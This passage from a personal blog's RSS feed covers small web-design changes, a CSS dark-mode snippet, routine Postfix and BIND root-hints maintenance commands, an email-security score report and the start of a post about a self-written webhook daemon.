  1126.    <link>https://blog.x-way.org/Webdesign/2024/01/28/Tables-are-gone.html</link>
  1127.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324327</guid>
  1128.    <dc:creator>Andreas Jaggi</dc:creator>
  1129.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1130.    <pubDate>Sun, 28 Jan 2024 16:47:00 +0000</pubDate>
  1131.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  1132.    <description><![CDATA[<p>Over the last couple weeks I slowly replaced the various &lt;table&gt;-based layout elements of the blog with more modern HTML elements.<br>
  1133. And finally this afternoon the work was completed with the last &lt;table&gt; element gone.</p>
  1134. <p>Visually there should be almost no differences, but in case something looks strange just let <a href="https://blog.x-way.org/about.html" title="x-log - About">me</a> know :-)<br>
  1135. (and yes, style-wise everything is still using the pixel-based layout from 2002, one day this might change as well&hellip;)</p>
  1136. ]]></description>
  1137.    <content:encoded><![CDATA[<p>Over the last couple weeks I slowly replaced the various &lt;table&gt;-based layout elements of the blog with more modern HTML elements.<br>
  1138. And finally this afternoon the work was completed with the last &lt;table&gt; element gone.</p>
  1139. <p>Visually there should be almost no differences, but in case something looks strange just let <a href="https://blog.x-way.org/about.html" title="x-log - About">me</a> know :-)<br>
  1140. (and yes, style-wise everything is still using the pixel-based layout from 2002, one day this might change as well&hellip;)</p>
  1141. ]]></content:encoded>
  1142.  </item>
  1143.  
  1144.  <item>
  1145.    <title>Quick and dirty dark mode</title>
  1146.    <link>https://blog.x-way.org/Webdesign/2024/01/27/Quick-and-dirty-dark-mode.html</link>
  1147.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324326</guid>
  1148.    <dc:creator>Andreas Jaggi</dc:creator>
  1149.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1150.    <pubDate>Sat, 27 Jan 2024 15:59:00 +0000</pubDate>
  1151.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  1152.    <description><![CDATA[<p>To provide basic dark mode support for the blog, I added the following lines of CSS:</p>
  1153. <pre>
  1154. @media (prefers-color-scheme: dark) {
  1155.    html { filter: invert(1) hue-rotate(180deg); }
  1156.    img, video, iframe { filter: invert(1) hue-rotate(180deg); }
  1157. }
  1158. </pre>
  1159. <p>If the browser/OS has dark mode enabled it will invert the colors and rotate the hue to achieve the dark mode effect.<br>The whole operation is applied a second time on images, videos and frames to avoid that they have their colors distorted.</p>
  1160. <p>You can get a preview by using the developer tools of your browser to enable dark mode :-)</p>
  1161. <p>The code is inspired by the post <a href="https://dev.to/akhilarjun/one-line-dark-mode-using-css-24li" title="One line - Dark Mode using CSS - DEV Community">here</a>, and then extended to provide a CSS-only solution by leveraging the <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/color-scheme" title="color-scheme - CSS: Cascading Style Sheets | MDN">color-scheme CSS property</a>.</p>
  1162. ]]></description>
  1163.    <content:encoded><![CDATA[<p>To provide basic dark mode support for the blog, I added the following lines of CSS:</p>
  1164. <pre>
  1165. @media (prefers-color-scheme: dark) {
  1166.    html { filter: invert(1) hue-rotate(180deg); }
  1167.    img, video, iframe { filter: invert(1) hue-rotate(180deg); }
  1168. }
  1169. </pre>
  1170. <p>If the browser/OS has dark mode enabled it will invert the colors and rotate the hue to achieve the dark mode effect.<br>The whole operation is applied a second time on images, videos and frames to avoid that they have their colors distorted.</p>
  1171. <p>You can get a preview by using the developer tools of your browser to enable dark mode :-)</p>
  1172. <p>The code is inspired by the post <a href="https://dev.to/akhilarjun/one-line-dark-mode-using-css-24li" title="One line - Dark Mode using CSS - DEV Community">here</a>, and then extended to provide a CSS-only solution by leveraging the <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/color-scheme" title="color-scheme - CSS: Cascading Style Sheets | MDN">color-scheme CSS property</a>.</p>
  1173. ]]></content:encoded>
  1174.  </item>
  1175.  
  1176.  <item>
  1177.    <title>Sub Focus, Dimension, Culture Shock &#x26; 1991</title>
  1178.    <link>https://blog.x-way.org/Music/2024/01/21/Sub-Focus-Dimension-Culture-Shock-1991.html</link>
  1179.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324325</guid>
  1180.    <dc:creator>Andreas Jaggi</dc:creator>
  1181.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1182.    <pubDate>Sun, 21 Jan 2024 22:16:00 +0000</pubDate>
  1183.    <category domain="https://blog.x-way.org/Music">Music</category>
  1184.    <description><![CDATA[<p><a href="https://youtu.be/OZMWKqbcwzo" title="Sub Focus, Dimension, Culture Shock &amp; 1991 - YouTube">Sub Focus, Dimension, Culture Shock &amp; 1991</a></p>
  1185. <p>Some very fine Drum and bass. Recently got to experience two of them live (Sub Focus &amp; 1991), and have plans to see Dimension next :-)</p>
  1186. <p>Especially like the little <a href="https://theprodigy.com" title="The Prodigy">The Prodigy</a> mixin starting at 1:04:30 &#x1F973;</p>
  1187. ]]></description>
  1188.    <content:encoded><![CDATA[<p><a href="https://youtu.be/OZMWKqbcwzo" title="Sub Focus, Dimension, Culture Shock &amp; 1991 - YouTube">Sub Focus, Dimension, Culture Shock &amp; 1991</a></p>
  1189. <p>Some very fine Drum and bass. Recently got to experience two of them live (Sub Focus &amp; 1991), and have plans to see Dimension next :-)</p>
  1190. <p>Especially like the little <a href="https://theprodigy.com" title="The Prodigy">The Prodigy</a> mixin starting at 1:04:30 &#x1F973;</p>
  1191. ]]></content:encoded>
  1192.  </item>
  1193.  
  1194.  <item>
  1195.    <title>Keeping old URLs alive</title>
  1196.    <link>https://blog.x-way.org/Misc/2024/01/21/Keeping-old-URLs-alive.html</link>
  1197.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324324</guid>
  1198.    <dc:creator>Andreas Jaggi</dc:creator>
  1199.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1200.    <pubDate>Sun, 21 Jan 2024 21:41:00 +0000</pubDate>
  1201.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1202.    <description><![CDATA[<p>As mentioned before, I'm a supporter of the <a href="https://www.w3.org/Provider/Style/URI" title="Hypertext Style: Cool URIs don't change">Cool URIs don't change</a> approach.<br>Thus I try to keep all the URLs of this blog working (or at least make them redirect to the new place where the content is located).<br>Not always an easy task with old domains and multiple blogging engines accumulated over the years.</p>
  1203. <p>To help me with that (and ensure I don't break anything when updating a 10+ year old mod_rewrite config) I created a short Bash script to test the redirect behavior.<br>It contains a list of URLs and their expected redirect target, goes through them with <a href="https://curl.se" title="curl">curl</a> and checks that the correct <code>Location:</code> header is returned.</p>
  1204. <p>As it might be useful for others in similar situations, the script can be found <a href="https://blog.x-way.org/stuff/test.sh" title="test.sh">here</a>.</p>
  1205. ]]></description>
  1206.    <content:encoded><![CDATA[<p>As mentioned before, I'm a supporter of the <a href="https://www.w3.org/Provider/Style/URI" title="Hypertext Style: Cool URIs don't change">Cool URIs don't change</a> approach.<br>Thus I try to keep all the URLs of this blog working (or at least make them redirect to the new place where the content is located).<br>Not always an easy task with old domains and multiple blogging engines accumulated over the years.</p>
  1207. <p>To help me with that (and ensure I don't break anything when updating a 10+ year old mod_rewrite config) I created a short Bash script to test the redirect behavior.<br>It contains a list of URLs and their expected redirect target, goes through them with <a href="https://curl.se" title="curl">curl</a> and checks that the correct <code>Location:</code> header is returned.</p>
  1208. <p>As it might be useful for others in similar situations, the script can be found <a href="https://blog.x-way.org/stuff/test.sh" title="test.sh">here</a>.</p>
  1209. ]]></content:encoded>
  1210.  </item>
  1211.  
  1212.  <item>
  1213.    <title>I miss human curation</title>
  1214.    <link>https://blog.x-way.org/Misc/2024/01/21/I-miss-human-curation.html</link>
  1215.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324323</guid>
  1216.    <dc:creator>Andreas Jaggi</dc:creator>
  1217.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1218.    <pubDate>Sun, 21 Jan 2024 07:14:00 +0000</pubDate>
  1219.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1220.    <description><![CDATA[<p><a href="https://blog.cassidoo.co/post/human-curation/" title="I miss human curation - Cassidy's blog">I miss human curation</a> &mdash; Where are my internet friends? And where are their weird blogs? (<a href="https://kniebes.com/link/a97dd47db2b511eebfd9408d5c84b5d9" title="Markus Kniebes Journal">via</a>)<p>
  1221. ]]></description>
  1222.    <content:encoded><![CDATA[<p><a href="https://blog.cassidoo.co/post/human-curation/" title="I miss human curation - Cassidy's blog">I miss human curation</a> &mdash; Where are my internet friends? And where are their weird blogs? (<a href="https://kniebes.com/link/a97dd47db2b511eebfd9408d5c84b5d9" title="Markus Kniebes Journal">via</a>)<p>
  1223. ]]></content:encoded>
  1224.  </item>
  1225.  
  1226.  <item>
  1227.    <title>Postfix clear verification cache</title>
  1228.    <link>https://blog.x-way.org/Linux/2024/01/07/Postfix-clear-verification-cache.html</link>
  1229.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324322</guid>
  1230.    <dc:creator>Andreas Jaggi</dc:creator>
  1231.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1232.    <pubDate>Sun, 07 Jan 2024 22:38:00 +0000</pubDate>
  1233.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  1234.    <description><![CDATA[<p>While adding some new alias functionality to my setup, it repeatedly failed with an error similar to this, despite my configuration changes:</p>
  1235. <pre>Recipient address rejected: unverified address: host XXX[XXX] said: 550 5.1.1
  1236. &lt;foo@bar.com&gt; User doesn't exist: foo@bar.com (in reply to RCPT TO command);</pre>
  1237. <p>Turns out that the negative verification result is cached and the cache is not reset during a reload/restart of postfix.<br>
  1238. Thus it must be cleared manually like this:</p>
  1239. <pre>/etc/init.d/postfix stop
  1240. rm /var/lib/postfix/verify_cache.db
  1241. /etc/init.d/postfix start</pre>
  1242. ]]></description>
  1243.    <content:encoded><![CDATA[<p>While adding some new alias functionality to my setup, it repeatedly failed with an error similar to this, despite my configuration changes:</p>
  1244. <pre>Recipient address rejected: unverified address: host XXX[XXX] said: 550 5.1.1
  1245. &lt;foo@bar.com&gt; User doesn't exist: foo@bar.com (in reply to RCPT TO command);</pre>
  1246. <p>Turns out that the negative verification result is cached and the cache is not reset during a reload/restart of postfix.<br>
  1247. Thus it must be cleared manually like this:</p>
  1248. <pre>/etc/init.d/postfix stop
  1249. rm /var/lib/postfix/verify_cache.db
  1250. /etc/init.d/postfix start</pre>
  1251. ]]></content:encoded>
  1252.  </item>
  1253.  
  1254.  <item>
  1255.    <title>Valid HTML5</title>
  1256.    <link>https://blog.x-way.org/Webdesign/2024/01/03/Valid-HTML5.html</link>
  1257.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324321</guid>
  1258.    <dc:creator>Andreas Jaggi</dc:creator>
  1259.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1260.    <pubDate>Wed, 03 Jan 2024 20:59:00 +0000</pubDate>
  1261.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  1262.    <description><![CDATA[<p>After <a href="https://blog.x-way.org/Webdesign/2024/01/01/Winter-plain-2.html" title="Winter - plain 2">switching the colors</a> of the design, I kept the momentum and continued working on the HTML of the blog.</p>
  1263. <p>It took couple iterations of multiple hours, but now it's done: the HTML source of this blog is <a href="https://validator.w3.org/nu/?doc=https%3A%2F%2Fblog.x-way.org%2F" title="Nu HTML Checker">valid HTML5</a>!</p>
  1264. <p>Getting rid of the obsoleteness hidden in old blogentries dating back over 20 years also led to some interesting observations.<br>
  1265. Back when moving from HTML 4.01 to <a href="https://blog.x-way.org/Coding/2004/04/08/x-log_v202c.html" title="x-log v2.02c">XHTML 1.1</a>, I remember spending some time to transform old <code>&lt;br&gt;</code> tags to <code>&lt;br /&gt;</code>. And now for HTML5 I did the inverse and moved all <code>&lt;br /&gt;</code> tags back to <code>&lt;br&gt;</code> :-)</p>
  1266. <p>Also once more I'm very thankful for the work of the <a href="https://archive.org/" title="Internet Archive">Internet Archive</a>, which helped to recover images hosted on servers long gone (like URLs which already at the end of 2002 were no longer valid!).</p>
  1267. <p>Overall a lot of replacing no longer existing HTML tags and attributes with CSS definitions.<br>And there is virtually no change to the visual representation of the blog (which was the goal), so we still have the table-based layout with pixel-sized fonts as originally drafted in 2002.<br>Moving this to actually leverage modern HTML5 mechanisms and making it also more mobile friendly are tasks left for some future cold winter evenings :-)</p>
  1268. <p><a href="https://validator.w3.org/nu/?doc=https%3A%2F%2Fblog.x-way.org%2F" title="Valid W3C HTML5"><img src="https://blog.x-way.org/images/html5-validator-badge.png" width="352" height="124" alt="W3C HTML5"></a></p>
  1269. ]]></description>
  1270.    <content:encoded><![CDATA[<p>After <a href="https://blog.x-way.org/Webdesign/2024/01/01/Winter-plain-2.html" title="Winter - plain 2">switching the colors</a> of the design, I kept the momentum and continued working on the HTML of the blog.</p>
  1271. <p>It took couple iterations of multiple hours, but now it's done: the HTML source of this blog is <a href="https://validator.w3.org/nu/?doc=https%3A%2F%2Fblog.x-way.org%2F" title="Nu HTML Checker">valid HTML5</a>!</p>
  1272. <p>Getting rid of the obsoleteness hidden in old blogentries dating back over 20 years also led to some interesting observations.<br>
  1273. Back when moving from HTML 4.01 to <a href="https://blog.x-way.org/Coding/2004/04/08/x-log_v202c.html" title="x-log v2.02c">XHTML 1.1</a>, I remember spending some time to transform old <code>&lt;br&gt;</code> tags to <code>&lt;br /&gt;</code>. And now for HTML5 I did the inverse and moved all <code>&lt;br /&gt;</code> tags back to <code>&lt;br&gt;</code> :-)</p>
  1274. <p>Also once more I'm very thankful for the work of the <a href="https://archive.org/" title="Internet Archive">Internet Archive</a>, which helped to recover images hosted on servers long gone (like URLs which already at the end of 2002 were no longer valid!).</p>
  1275. <p>Overall a lot of replacing no longer existing HTML tags and attributes with CSS definitions.<br>And there is virtually no change to the visual representation of the blog (which was the goal), so we still have the table-based layout with pixel-sized fonts as originally drafted in 2002.<br>Moving this to actually leverage modern HTML5 mechanisms and making it also more mobile friendly are tasks left for some future cold winter evenings :-)</p>
  1276. <p><a href="https://validator.w3.org/nu/?doc=https%3A%2F%2Fblog.x-way.org%2F" title="Valid W3C HTML5"><img src="https://blog.x-way.org/images/html5-validator-badge.png" width="352" height="124" alt="W3C HTML5"></a></p>
  1277. ]]></content:encoded>
  1278.  </item>
  1279.  
  1280.  <item>
  1281.    <title>Winter - plain 2</title>
  1282.    <link>https://blog.x-way.org/Webdesign/2024/01/01/Winter-plain-2.html</link>
  1283.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324320</guid>
  1284.    <dc:creator>Andreas Jaggi</dc:creator>
  1285.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1286.    <pubDate>Mon, 01 Jan 2024 12:41:00 +0000</pubDate>
  1287.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  1288.    <description><![CDATA[<p>Happy New Year! &mdash; Happy New Colors!</p>
  1289. <p>Winter is here (for a while already), time to change the colors of the blog.<br>
  1290. To keep it in the nostalgic theme (the previous design was a <a href="https://blog.x-way.org/Webdesign/2022/06/04/Blogging-like-2002.html" title="x-log - Blogging like 2002">repurpose of the inital design from 2002</a>), I'm using the colors from the <a href="https://blog.x-way.org/Webdesign/2002/12/15/Winter.html" title="x-log - Winter">'plain 2' winter layout</a> (also from 2002).</p>
  1291. <p>Enjoy!</p>
  1292. ]]></description>
  1293.    <content:encoded><![CDATA[<p>Happy New Year! &mdash; Happy New Colors!</p>
  1294. <p>Winter is here (for a while already), time to change the colors of the blog.<br>
  1295. To keep it in the nostalgic theme (the previous design was a <a href="https://blog.x-way.org/Webdesign/2022/06/04/Blogging-like-2002.html" title="x-log - Blogging like 2002">repurpose of the inital design from 2002</a>), I'm using the colors from the <a href="https://blog.x-way.org/Webdesign/2002/12/15/Winter.html" title="x-log - Winter">'plain 2' winter layout</a> (also from 2002).</p>
  1296. <p>Enjoy!</p>
  1297. ]]></content:encoded>
  1298.  </item>
  1299.  
  1300.  <item>
  1301.    <title>MECSA</title>
  1302.    <link>https://blog.x-way.org/Networking/2023/12/30/MECSA.html</link>
  1303.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324319</guid>
  1304.    <dc:creator>Andreas Jaggi</dc:creator>
  1305.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1306.    <pubDate>Sat, 30 Dec 2023 09:16:00 +0000</pubDate>
  1307.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  1308.    <description><![CDATA[<p>A <a href="https://news.ycombinator.com/item?id=38792358" title="True, MECSA is also interesting: https://mecsa.jrc.ec.europa.eu/en/ | Hacker News">comment on Hacker News</a> pointed me to the <a href="https://mecsa.jrc.ec.europa.eu/en/" title="My Email Communications Security Assessment (MECSA)">MECSA tool</a> provided by the European Union.</p>
  1309. <p>MECSA stands for My Email Communications Security Assessment, and is a tool to assess the security of email communication between providers.</p>
  1310. <p>As I run my own email server, I was curious to find out how my setup is scoring. Here are the results, seems like I'm doing a good job :-)</p>
  1311. <p><a href="https://blog.x-way.org/images/mecsa_scores_full.png" title="MECSA score for jaggi.info, showing 5/5 stars in Confidential Delivery, Phishing and Identity Theft, and Intergrity of Messages."><img src="https://blog.x-way.org/images/mecsa_scores.png" alt="MECSA score for jaggi.info, showing 5/5 stars in Confidential Delivery, Phishing and Identity Theft, and Intergrity of Messages." height="61" width="650"></a></p>
  1312. <p><a href="https://blog.x-way.org/images/mecsa_details_full.png" title="MECSA details for jaggi.info, showing 100 points in StartTLS, X509, SPF, DKIM, DMARC, DANE, DNSSEC and MTA-STS."><img src="https://blog.x-way.org/images/mecsa_details.png" alt="MECSA details for jaggi.info, showing 100 points in StartTLS, X509, SPF, DKIM, DMARC, DANE, DNSSEC and MTA-STS." height="75" width="650"></a></p>
  1313. <p>Link to the full report for jaggi.info: <a href="https://mecsa.jrc.ec.europa.eu/en/finderRequest/f856486ecaf94dce5e8022c0a97c63b3" title="Report id f856486ecaf94dce5e8022c0a97c63b3 for domain jaggi.info (28/12/2023)">https://mecsa.jrc.ec.europa.eu/en/finderRequest/f856486ecaf94dce5e8022c0a97c63b3</a></p>
  1314. ]]></description>
  1315.    <content:encoded><![CDATA[<p>A <a href="https://news.ycombinator.com/item?id=38792358" title="True, MECSA is also interesting: https://mecsa.jrc.ec.europa.eu/en/ | Hacker News">comment on Hacker News</a> pointed me to the <a href="https://mecsa.jrc.ec.europa.eu/en/" title="My Email Communications Security Assessment (MECSA)">MECSA tool</a> provided by the European Union.</p>
  1316. <p>MECSA stands for My Email Communications Security Assessment, and is a tool to assess the security of email communication between providers.</p>
  1317. <p>As I run my own email server, I was curious to find out how my setup is scoring. Here are the results, seems like I'm doing a good job :-)</p>
  1318. <p><a href="https://blog.x-way.org/images/mecsa_scores_full.png" title="MECSA score for jaggi.info, showing 5/5 stars in Confidential Delivery, Phishing and Identity Theft, and Intergrity of Messages."><img src="https://blog.x-way.org/images/mecsa_scores.png" alt="MECSA score for jaggi.info, showing 5/5 stars in Confidential Delivery, Phishing and Identity Theft, and Intergrity of Messages." height="61" width="650"></a></p>
  1319. <p><a href="https://blog.x-way.org/images/mecsa_details_full.png" title="MECSA details for jaggi.info, showing 100 points in StartTLS, X509, SPF, DKIM, DMARC, DANE, DNSSEC and MTA-STS."><img src="https://blog.x-way.org/images/mecsa_details.png" alt="MECSA details for jaggi.info, showing 100 points in StartTLS, X509, SPF, DKIM, DMARC, DANE, DNSSEC and MTA-STS." height="75" width="650"></a></p>
  1320. <p>Link to the full report for jaggi.info: <a href="https://mecsa.jrc.ec.europa.eu/en/finderRequest/f856486ecaf94dce5e8022c0a97c63b3" title="Report id f856486ecaf94dce5e8022c0a97c63b3 for domain jaggi.info (28/12/2023)">https://mecsa.jrc.ec.europa.eu/en/finderRequest/f856486ecaf94dce5e8022c0a97c63b3</a></p>
  1321. ]]></content:encoded>
  1322.  </item>
  1323.  
  1324.  <item>
  1325.    <title>Fix named checkhints extra record in hints</title>
  1326.    <link>https://blog.x-way.org/Linux/2023/12/27/Fix-named-checkhints-extra-record-in-hints.html</link>
  1327.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324318</guid>
  1328.    <dc:creator>Andreas Jaggi</dc:creator>
  1329.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1330.    <pubDate>Wed, 27 Dec 2023 20:53:00 +0000</pubDate>
  1331.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  1332.    <description><![CDATA[<p>Recently named on my Debian server started to emit the following messages:</p>
  1333. <pre>Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/A (170.247.170.2) missing from hints
  1334. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/A (199.9.14.201) extra record in hints
  1335. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/AAAA (2801:1b8:10::b) missing from hints
  1336. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/AAAA (2001:500:200::b) extra record in hints</pre>
  1337. <p>The reason for these warnings, is a <a href="https://b.root-servers.org/news/2023/05/16/new-addresses.html" title="New addresses for b.root-servers.net">IP change of the B root-server</a>.</p>
  1338. <p>Debian is <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1054393" title="Debian bug report #1054393">not ready yet</a> with updating their dns-root-data package.<br>To fix the mismatching IP definitions on a Debian system, the current root zone definitions can also be updated manually from Internic:</p>
  1339. <pre>curl https://www.internic.net/domain/named.root -s &gt; /usr/share/dns/root.hints
  1340. curl https://www.internic.net/domain/named.root.sig -s &gt; /usr/share/dns/root.hints.sig</pre>
  1341. ]]></description>
  1342.    <content:encoded><![CDATA[<p>Recently named on my Debian server started to emit the following messages:</p>
  1343. <pre>Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/A (170.247.170.2) missing from hints
  1344. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/A (199.9.14.201) extra record in hints
  1345. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/AAAA (2801:1b8:10::b) missing from hints
  1346. Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/AAAA (2001:500:200::b) extra record in hints</pre>
  1347. <p>The reason for these warnings, is a <a href="https://b.root-servers.org/news/2023/05/16/new-addresses.html" title="New addresses for b.root-servers.net">IP change of the B root-server</a>.</p>
  1348. <p>Debian is <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1054393" title="Debian bug report #1054393">not ready yet</a> with updating their dns-root-data package.<br>To fix the mismatching IP definitions on a Debian system, the current root zone definitions can also be updated manually from Internic:</p>
  1349. <pre>curl https://www.internic.net/domain/named.root -s &gt; /usr/share/dns/root.hints
  1350. curl https://www.internic.net/domain/named.root.sig -s &gt; /usr/share/dns/root.hints.sig</pre>
  1351. ]]></content:encoded>
  1352.  </item>
  1353.  
  1354.  <item>
  1355.    <title>Wikipedia Donation</title>
  1356.    <link>https://blog.x-way.org/Misc/2023/12/10/Wikipedia-Donation.html</link>
  1357.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324317</guid>
  1358.    <dc:creator>Andreas Jaggi</dc:creator>
  1359.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1360.    <pubDate>Sun, 10 Dec 2023 22:24:00 +0000</pubDate>
  1361.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1362.    <description><![CDATA[<p>Seems that after donating to Wikipedia there is a redirect to <a href="https://thankyou.wikipedia.org/wiki/Thank_You/en" rel="noreferrer" title="Thank You - Wikimedia Foundation">this page</a>, which sets a cookie to no longer show the donation banners.</p>
  1363. ]]></description>
  1364.    <content:encoded><![CDATA[<p>Seems that after donating to Wikipedia there is a redirect to <a href="https://thankyou.wikipedia.org/wiki/Thank_You/en" rel="noreferrer" title="Thank You - Wikimedia Foundation">this page</a>, which sets a cookie to no longer show the donation banners.</p>
  1365. ]]></content:encoded>
  1366.  </item>
  1367.  
  1368.  <item>
  1369.    <title>Why Personal Blogging Still Rules</title>
  1370.    <link>https://blog.x-way.org/Misc/2023/04/30/Why-Personal-Blogging-Still-Rules.html</link>
  1371.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324316</guid>
  1372.    <dc:creator>Andreas Jaggi</dc:creator>
  1373.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1374.    <pubDate>Sun, 30 Apr 2023 14:42:00 +0000</pubDate>
  1375.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1376.    <description><![CDATA[<p>Resonating article from <a href="https://mikegrindle.com/" title="Mike Grindle - Homepage">Mike Grindle</a> about personal blogging and how it fits into todays Internet: <a href="https://mikegrindle.com/posts/personal-blogging" title="Why Personal Blogging Still Rules - mikegrindle.com">Why Personal Blogging Still Rules</a></p>
  1377. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1378. <p>Before the social media craze or publishing platforms, and long before ‘content creator’ was a job title, blogs served as one of the primary forms of online expression and communication.</p>
  1379. </blockquote>
  1380. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1381. <p>Everything on your blog was made to look and feel the way you wanted. If it didn’t, you rolled your sleeves up and coded that stuff in like the webmaster you were. And if the masses didn’t like it, who cared? They had no obligations to you, and you had none to them.</p>
  1382. </blockquote>
  1383. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1384. <p>Hiding beneath the drivel that is Google’s search results, and all the trackers, cookies, ads and curated feeds that come with them, personal blogs and sites of all shapes and sizes are still there. They’re thriving even in a kind of interconnected web beneath the web.</p>
  1385. </blockquote>
  1386. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1387. <p>The blogs on this small or “indie” web come in many shapes and sizes. [&hellip;] But at their core, they all have one characteristic in common: they’re there because their owners wanted to carve out their space on the internet.</p>
  1388. </blockquote>
  1389. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1390. <p>Your blog doesn’t have to be big and fancy. It doesn’t have to outrank everyone on Google, make money or “convert leads” to be important. It can be something that exists for its own sake, as your place to express yourself in whatever manner you please.</p>
  1391. </blockquote>
  1392. <p>(<a href="https://uninformation.org/webnotizen/23/why-personal-blogging-still-rules/" title="der Uninformat – »Why Personal Blogging Still Rules«">via</a>)</p>
  1393. ]]></description>
  1394.    <content:encoded><![CDATA[<p>Resonating article from <a href="https://mikegrindle.com/" title="Mike Grindle - Homepage">Mike Grindle</a> about personal blogging and how it fits into todays Internet: <a href="https://mikegrindle.com/posts/personal-blogging" title="Why Personal Blogging Still Rules - mikegrindle.com">Why Personal Blogging Still Rules</a></p>
  1395. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1396. <p>Before the social media craze or publishing platforms, and long before ‘content creator’ was a job title, blogs served as one of the primary forms of online expression and communication.</p>
  1397. </blockquote>
  1398. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1399. <p>Everything on your blog was made to look and feel the way you wanted. If it didn’t, you rolled your sleeves up and coded that stuff in like the webmaster you were. And if the masses didn’t like it, who cared? They had no obligations to you, and you had none to them.</p>
  1400. </blockquote>
  1401. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1402. <p>Hiding beneath the drivel that is Google’s search results, and all the trackers, cookies, ads and curated feeds that come with them, personal blogs and sites of all shapes and sizes are still there. They’re thriving even in a kind of interconnected web beneath the web.</p>
  1403. </blockquote>
  1404. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1405. <p>The blogs on this small or “indie” web come in many shapes and sizes. [&hellip;] But at their core, they all have one characteristic in common: they’re there because their owners wanted to carve out their space on the internet.</p>
  1406. </blockquote>
  1407. <blockquote cite="https://mikegrindle.com/posts/personal-blogging">
  1408. <p>Your blog doesn’t have to be big and fancy. It doesn’t have to outrank everyone on Google, make money or “convert leads” to be important. It can be something that exists for its own sake, as your place to express yourself in whatever manner you please.</p>
  1409. </blockquote>
  1410. <p>(<a href="https://uninformation.org/webnotizen/23/why-personal-blogging-still-rules/" title="der Uninformat – »Why Personal Blogging Still Rules«">via</a>)</p>
  1411. ]]></content:encoded>
  1412.  </item>
  1413.  
  1414.  <item>
  1415.    <title>exec-hookd</title>
  1416.    <link>https://blog.x-way.org/Linux/2023/04/23/exec-hookd.html</link>
  1417.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324315</guid>
  1418.    <dc:creator>Andreas Jaggi</dc:creator>
  1419.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1420.    <pubDate>Sun, 23 Apr 2023 22:32:00 +0000</pubDate>
  1421.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  1422.    <description><![CDATA[<p>To automate some of the deployment steps on my personal server, I needed a tool which can be triggered by a webhook and does execute some pre-defined commands.</p>
  1423. <p>A classic solution for this would be to have a simple PHP script with a call to <code>system(...)</code>. But I don't have PHP installed on the server itself and wanted this to be more lightweight than a full Apache+PHP installation.</p>
  1424. <p>Thus <a href="https://github.com/x-way/exec-hookd" title="x-way/exec-hookd: execute commands from webhooks">exec-hookd</a> was born. It is a small Go daemon which listens to HTTP POST requests and runs pre-defined commands when a matching path is requested.</p>
  1425. <p>Its configuration lives in a small JSON file, which lists the port to listen on and the paths together with their commands to execute:</p>
  1426. <pre>{
